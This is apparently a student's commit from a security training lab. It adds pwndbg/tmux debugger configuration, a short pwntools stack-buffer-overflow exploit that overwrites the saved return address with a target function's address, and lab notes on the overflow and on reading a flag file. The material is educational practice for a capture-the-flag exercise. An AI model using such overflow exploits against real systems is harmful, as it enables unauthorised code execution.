lab 4a, got some nice pwndbg layout config

.gdb_split.py

@@ -0,0 +1,41 @@
+import atexit
+import os
+from pwndbg.commands.context import contextoutput, output, clear_screen
+
+bt = (
+    os.popen('tmux split-window -P -F "#{pane_id}:#{pane_tty}" -d "cat -"')
+    .read()
+    .strip()
+    .split(":")
+)
+st = (
+    os.popen(
+        f"tmux split-window -h -t {bt[0]} -P -F "
+        + '"#{pane_id}:#{pane_tty}" -d "cat -"'
+    )
+    .read()
+    .strip()
+    .split(":")
+)
+re = (
+    os.popen(
+        f"tmux split-window -h -t {st[0]} -P -F "
+        + '"#{pane_id}:#{pane_tty}" -d "cat -"'
+    )
+    .read()
+    .strip()
+    .split(":")
+)
+di = (
+    os.popen('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -d "cat -"')
+    .read()
+    .strip()
+    .split(":")
+)
+panes = dict(backtrace=bt, stack=st, regs=re, disasm=di)
+for sec, p in panes.items():
+    contextoutput(sec, p[1], True)
+contextoutput("legend", di[1], True)
+atexit.register(
+    lambda: [os.popen(f"tmux kill-pane -t {p[0]}").read() for p in panes.values()]
+)

.gdbinit

@@ -0,0 +1,5 @@
+source /opt/pwndbg/gdbinit.py
+set context-stack-lines 20
+set context-sections disasm stack regs backtrace
+source ~/.gdb_split.py
+

4a/lab4a.py

@@ -0,0 +1,46 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template
+from pwn import *
+
+# Set up pwntools for the correct architecture
+# context.update(arch='i386')
+exe = '/challenge/run'
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args".  For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+
+
+
+def start(argv=[], *a, **kw):
+    '''Start the exploit against the target.'''
+    if args.GDB:
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    else:
+        return process([exe] + argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+continue
+'''.format(**locals())
+
+#===========================================================
+#                    EXPLOIT GOES HERE
+#===========================================================
+
+io = start()
+
+unbound_buffer = 0x7ffd6f3ab780
+saved_rip = 0x7ffd6f3ab7c8
+offset = saved_rip-unbound_buffer
+
+target_fn = 0x401166
+payload = b'F' * (offset - len('records/')) + p64(target_fn) + b'\n'
+
+io.send(payload)
+io.interactive()

Dojo Notes.md

@@ -356,3 +356,21 @@ done
 ### .15 - blind leading the blind
 
 - basically, stdout and stderr for the child are set to `/dev/null` so instead of spawning root shell, use `cat flag > output` and read output
+
+### .16 - arg wars VI - return of the hacker
+
+- decompiler showed set of filtered characters, quotes and backslashes are not there
+- also .17 checks for backslashes, so i assume backslashes solves this
+- but i got stuck, TA said try the 'prequels' first then come back lol
+
+### lab 4a.1 - easy overflow
+
+- standard buffer overflow vuln
+- gdb shenanigans
+- shift-ctrl-@ inserts a null character it seems (remember for .16)
+- enough gdb, let's move to big guns - pwntools
+- checksec says no stack canary or PIE
+- all g then
+- calculate offset from vulnerable variable location to saved RIP(return instruction pointer) location
+- get address of target function to execute
+- craft payload accordingly